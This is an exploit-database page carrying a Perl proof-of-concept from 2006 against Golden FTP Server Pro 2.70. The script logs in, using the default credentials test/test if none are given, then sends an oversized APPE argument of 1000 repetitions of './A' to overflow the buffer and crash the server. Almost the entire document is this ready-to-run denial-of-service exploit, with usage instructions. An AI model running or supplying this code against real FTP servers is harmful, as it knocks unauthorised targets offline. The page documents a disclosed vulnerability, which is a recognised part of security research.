Golden FTP Server Pro 2.70 (APPE) Remote Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Golden FTP Server Pro 2.70 (APPE) Remote Buffer Overflow PoC
# Published : 2006-05-03
# Author : Jerome Athias
# Previous Title : acFTP FTP Server <= 1.4 (USER) Remote Buffer Overflow PoC
# Next Title : BL4 SMTP Server < 0.1.5 Remote Buffer Overflow PoC

#!/usr/bin/perl

#
-----------------------------------------------------------------------------------------
# Golden FTP Server Pro 2.70 Remote APPE command PoC exploit : DoS
# /JA
# https://www.securinfos.info
#
-----------------------------------------------------------------------------------------

use Net::FTP;

$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];

if (($host) && ($port)) {

# Exploit string (try with a different value if needed)
$exploit_string = "./A" x 1000;

      print "Trying to connect to $host:$portn";
      $sock = Net::FTP->new("$host",Port => $port, TimeOut => 60, Debug=> $debug) or die "[-] Connection failedn";
      print "[+] Connect OK!n";
      print "Logging...n";
      if (!$user) {
           $user = "test";
           $pass = "test";
      }
      $sock->login($user, $pass);
      sleep(1);
      $answer = $sock->message;
      print $answer ."n";
      print "Sending string...n";
      $sock->quot("APPE",$exploit_string);
} else {
      print "Golden FTP Server Pro 2.70 - Remote APPE command PoC
exploit : DoSnhttps://www.securinfos.infonnUsing: $0 host port [debug: 1 or 0] username passwordnn";
}

# www.Syue.com [2006-05-03]